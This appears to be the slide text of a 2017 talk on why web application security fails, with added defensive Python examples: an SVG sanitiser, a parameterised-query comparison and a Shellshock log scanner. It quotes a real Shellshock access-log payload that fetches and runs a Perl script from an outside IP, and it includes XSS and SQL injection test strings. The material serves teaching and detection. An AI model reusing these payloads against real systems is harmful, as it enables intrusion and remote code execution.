HOW AND WHY
WEB APP
SECURITY FAILS?
16.2. 2017 Tampere University of Technology
Antti.virtanen@solita.fi
Twitter: @Anakondantti
FOREWORD, 1 MINUTE
› Solita?
› Me?
› Web application?
• Much more important than you may realize..
AGENDA
› How to make secure software?
› … But, everything is broken!
› … Because ...
• Same mistakes are repeated.
• Unthinkable, Unpossible, Impossiblator happens
› Practical web application security testing.
› Bonus: 10. fail 20. goto 10
SECURITY IS RISK
MANAGEMENT
“If you know the enemy and know yourself, you need not fear the result of a hundred battles.”
Sun Tzu, Art of War
Source: Hackerman, Kung Fury movie
Source: NSA recruitment video.
Source: securityintelligence.com
Source: Lizard Squad hacking group logo
SOLITA #DEVSEC LANDSCAPE
GOOD NEWS:
SECURITY IS SIMPLE!
Bad news: Simple != easy
RECIPE FOR SECURE SOFTWARE
1. Design it properly. Do the right thing.
2. Do it right
1. Mistake in implementation = bug = security issue
3. Prepare for the unthinkable
(Bug bounties etc. are useful too, but out of scope here.)
DO THE RIGHT THING
1. Don’t roll your own.
1. Especially, don’t invent hash algorithms, RND or crypto!
2. Seriously. Failure imminent and certain.
2. Follow best practices.
3. Understand what you are doing.
1. Read the RFC. Understand your tools and libs.
SOMETHING UNTHINKABLE
It’s the same story every day..
UNTHINKABLE NAMES?
UNTHINKABLE DOMAINS AND DNS
RECORDS (PUNYCODE ATTACK)
A PICTURE IS WORTH 1000 WORDS
› Demo-time: SVG is a picture file, right?
› Feeling lucky, punk?
WHAT THE ACTUAL **** ??
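Added example, not from the slides: the upload-side check in Python that the SVG demo argues for. An SVG is XML, so it can carry a DTD (the entity-expansion and XXE vector), `<script>` and `<foreignObject>` elements, `on*` event-handler attributes and `javascript:` links, none of which a "picture" needs. The function returns every reason the file is more than a picture, so a reject can be logged with the cause. Both SVG strings are constructed samples; a production check should parse with defusedxml rather than the standard library parser used here.

```python
import xml.etree.ElementTree as ET

ACTIVE_ELEMENTS = {"script", "foreignobject"}
URL_ATTRIBUTES = {"href", "src"}  # plain href and xlink:href both reduce to the local name "href"

# Constructed samples: a scripted "image" and a plain drawing.
SCRIPTED_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <script>alert('xss')</script>
  <circle r="10" onload="alert('xss')"/>
  <a xlink:href="javascript:alert('xss')"><text>click</text></a>
</svg>"""
CLEAN_SVG = """<svg xmlns="http://www.w3.org/2000/svg"><circle r="10" fill="red"/></svg>"""


def local_name(qualified: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return qualified.rsplit("}", 1)[-1]


def svg_active_content(data: str) -> list:
    """Return the reasons this SVG is more than a picture; an empty list means none found."""
    # Entity declarations are the XXE / billion-laughs vector: refuse them before parsing.
    if "<!DOCTYPE" in data or "<!ENTITY" in data:
        return ["DTD or entity declaration present"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    for el in root.iter():
        name = local_name(el.tag).lower()
        if name in ACTIVE_ELEMENTS:
            findings.append(f"<{name}> element")
        for attr, value in el.attrib.items():
            attr_name = local_name(attr).lower()
            if attr_name.startswith("on"):
                findings.append(f"event handler {attr_name} on <{name}>")
            elif attr_name in URL_ATTRIBUTES and \
                    value.strip().lower().startswith(("javascript:", "data:")):
                scheme = value.strip().split(":", 1)[0].lower()
                findings.append(f"{attr_name} with {scheme}: URL on <{name}>")
    return findings


def is_plain_picture(data: str) -> bool:
    """True only when nothing active was found."""
    return not svg_active_content(data)


if __name__ == "__main__":
    for label, doc in (("clean", CLEAN_SVG), ("scripted", SCRIPTED_SVG)):
        print(label, svg_active_content(doc))
```

Even a file that passes this check should still be served with a `Content-Type` of `image/svg+xml` from a separate origin, or rasterised on upload, because the list of things an SVG can do is longer than any deny-list; the check is the "is it a picture at all" gate, not the whole defence.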
INPUT SANITATION
= 80% WIN
THE SAME STORY ALL OVER!
› XSS, CSRF, SQL injection, XXE..
• Are all about input validation.
› Solution: white-list what is allowed, deny everything else.
› There’s still 20% left
• You can fail session management certainly, but..
• Follow the advice: Don’t invent your own and you’ll be pretty safe.
JAVASCRIPT
NECESSARY (?)
EVIL
JAVASCRIPT IS FULL OF EVIL
(GREPPING “EVIL” FROM JS SOURCES)
The most satisfying feeling you can
get in the job is... The Pwn. Let's say
you find SQL injection. Blood is
rushing into your brain and that's
what we call The Pwn. Your brain
gets a really tight feeling, like your
head is going to explode any minute,.
Arnold “Iceman” Schwarzenegger, movie Pwningiron.
DEMO/PRACTICE
AGAINST GRUYERE
http://google-gruyere.appspot.com/
LET’S XSS !
› Reflected vs. Stored
› <script> doesn’t work?
• No problem, JS is everywhere..
› Can’t XMLHttpRequest?
• No prob, counter and fake
SQL INJECTION
› GRUYERE does not contain SQL injection..
› But .. It’s a good example of an injection
› SQL = Structured Query Language
• However, “query” is a bit of a misnomer..
What is this???
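Added example, not from the slides or from Gruyere: the two halves of the "80%" advice in Python, serving both the input sanitation slide and this one. An allow-list validator for a username field sits in front of a parameterised sqlite3 query, next to the string-concatenated query that an injection goes straight through. The table and rows are constructed; the payload is the textbook `' OR '1'='1`.

```python
import re
import sqlite3

# Allow-list: the only shape a username may have. Everything else is rejected
# before it reaches the database, a template or a shell.
USERNAME_RE = re.compile(r"[a-z][a-z0-9_]{2,31}")


def valid_username(value: str) -> bool:
    return USERNAME_RE.fullmatch(value) is not None


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for a real user store."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "admin"), ("bob", "user")])
    return db


def lookup_unsafe(db: sqlite3.Connection, name: str) -> list:
    """The classic mistake: user input becomes part of the SQL text itself,
    so a quote in the input rewrites the statement."""
    sql = "SELECT name FROM users WHERE name = '%s' ORDER BY name" % name
    return [row[0] for row in db.execute(sql)]


def lookup_safe(db: sqlite3.Connection, name: str) -> list:
    """Parameterised query: the value travels separately from the statement,
    so it can never change the statement's structure."""
    rows = db.execute("SELECT name FROM users WHERE name = ? ORDER BY name", (name,))
    return [row[0] for row in rows]


def find_user(db: sqlite3.Connection, name: str):
    """Both layers together: allow-list first, parameterised query second.
    Returns None when the allow-list rejects the input."""
    if not valid_username(name):
        return None
    return lookup_safe(db, name)


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print("unsafe:", lookup_unsafe(db, payload))   # every row comes back
    print("safe:  ", lookup_safe(db, payload))     # no user has that literal name
    print("gated: ", find_user(db, payload))       # never reaches the database
```

The parameterised query is the real fix; the allow-list is the cheap second layer that also covers the places the value is used later (logs, HTML, shell commands), which is why the slides call input validation the common thread behind XSS, CSRF, SQL injection and XXE.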
INPUT SANITATION,
STILL FAILING
LOGIC ATTACKS ARE DIFFICULT
› Real example..
REAL WORLD ATTACK
FROM A REAL ACCESS LOG
(CUSTOMER IP REDACTED)
› 2015-02-09:2015-02-09 09:17:01,420 INFO xxxx.infra.print-wrapper: Request 387280 start. host: xxx.xxx.xxx.xxx ,remote-addr: xx.xxx.xx.xxx ,method: GET ,uri: /cgi-bin/adm.cgi ,query-string: ,user-agent: () { :;}; /bin/bash -c "cd /var/tmp;wget http://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perl efixx;perl /var/tmp/efixx;perl efixx" ,referer: ,oid:
Google tip: Shellshock
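Added example, not from the slides: a small Python scanner that parses the print-wrapper access-log format shown above (fields separated by ` ,`, the first one after a free-text prefix) and flags any field whose value begins with bash's exported-function prefix `() {`, the marker of a Shellshock probe, pulling the download URLs out of the payload as indicators. The parser assumes exactly the layout of the slide's line; the first sample line is that line reassembled, the second is a constructed benign request.

```python
import re

# The slide's log line on one line (IPs were already redacted on the slide),
# plus one constructed benign request for comparison.
SAMPLE_LOG = """2015-02-09:2015-02-09 09:17:01,420 INFO xxxx.infra.print-wrapper: Request 387280 start. host: xxx.xxx.xxx.xxx ,remote-addr: xx.xxx.xx.xxx ,method: GET ,uri: /cgi-bin/adm.cgi ,query-string: ,user-agent: () { :;}; /bin/bash -c "cd /var/tmp;wget http://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perl efixx;perl /var/tmp/efixx;perl efixx" ,referer: ,oid:
2015-02-09:2015-02-09 09:17:02,001 INFO xxxx.infra.print-wrapper: Request 387281 start. host: xxx.xxx.xxx.xxx ,remote-addr: xx.xxx.xx.xxx ,method: GET ,uri: /index.html ,query-string: ,user-agent: Mozilla/5.0 (X11; Linux x86_64) ,referer: ,oid:"""

# Bash's exported-function prefix. A CGI server copies request headers into
# environment variables; vulnerable bash versions executed what followed "() {".
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")
URL_RE = re.compile(r"https?://[^\s;\"']+")


def parse_access_line(line: str) -> dict:
    """Split one print-wrapper access line into its 'key: value' fields.
    Fields are separated by ' ,'; the first field, host:, follows a free-text prefix."""
    chunks = line.split(" ,")
    fields = {}
    _prefix, sep, host = chunks[0].rpartition(" host: ")
    if sep:
        fields["host"] = host.strip()
    for chunk in chunks[1:]:
        key, _, value = chunk.partition(":")   # first colon only: values may contain colons
        fields[key.strip()] = value.strip()
    return fields


def scan_log(lines) -> list:
    """Return one hit per field that carries the Shellshock prefix, with the URLs it names."""
    hits = []
    for number, line in enumerate(lines, start=1):
        fields = parse_access_line(line)
        for key, value in fields.items():
            if SHELLSHOCK_RE.search(value):
                hits.append({
                    "line": number,
                    "field": key,
                    "uri": fields.get("uri", ""),
                    "urls": sorted(set(URL_RE.findall(value))),
                })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(f"line {hit['line']}: Shellshock prefix in {hit['field']} "
              f"targeting {hit['uri']}, fetches {hit['urls']}")
```

Every header is scanned, not just `User-Agent`, because any header the server exports into the CGI environment is an equally good carrier; the `uri` in the hit tells you which CGI endpoint was being probed, and the URL list is what you hand to the people who own the server.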
WHAT THE ATTACKER WANTED?
efixx – first lines..
core – first lines..
DEV OR OPS? OR #DEVSEC ?
› Who is responsible for that server?
› Do you need to care as a developer?
› Ultimately: What is the developer’s responsibility?
SOME FAILS 2016-2017
Stories from the trenches
FAIL 1: THE BURDEN OF LEGACY
MD5 & C++ - “ELEGANT WEAPONS .. FOR A MORE CIVILIZED AGE”
› Native code is dangerous..
• ASLR & DEP make buffer overflows more difficult to exploit, but it still
happens.
› The lifespan of software can be surprisingly long..
• How to update and re-evaluate working software if nothing happens?
• Home-exercise: Sell this to team & customer. Involves risk and cost.
› New threats have emerged.
• What parts are affected?
Screenshot removed..
FAIL 2: SHORTCUTS AND ANARCHY
› Root cause: Heavy process, not understood / accepted by devs
• making developers miserable..
› The devs are innovative people..
http://unauthorized..
V 1.3 coolserver
AwesomeSoftware_Upgrade.exe
FAIL 3: “I ACCIDENTALLY”
STORY 4: THE WEBHACK EVENT
› http://webhack.fi was a light-weight fun bug bounty hunt..
• The targets are not publicly accessible, but were production systems we
created for our customers.
› Hackers hacked..
› .. SQL injection -> dumped the whole database
› .. But our code was fine! WAT?
ONE DOES NOT SIMPLY INJECT
INTO..
› One issue turned out to be a 0-day in Spring libraries..
› Hnggh..
› The moral of the story is two-fold:
1. even if you do everything right, you can still fail
2. it’s not always so easy in real life..
› The gory details: https://github.com/solita/sqli-poc
FURTHER MATERIAL
• From the internet:
• OWASP Top 10
• https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
• OWASP ZAP proxy
• https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
• Kali Linux
• https://www.kali.org/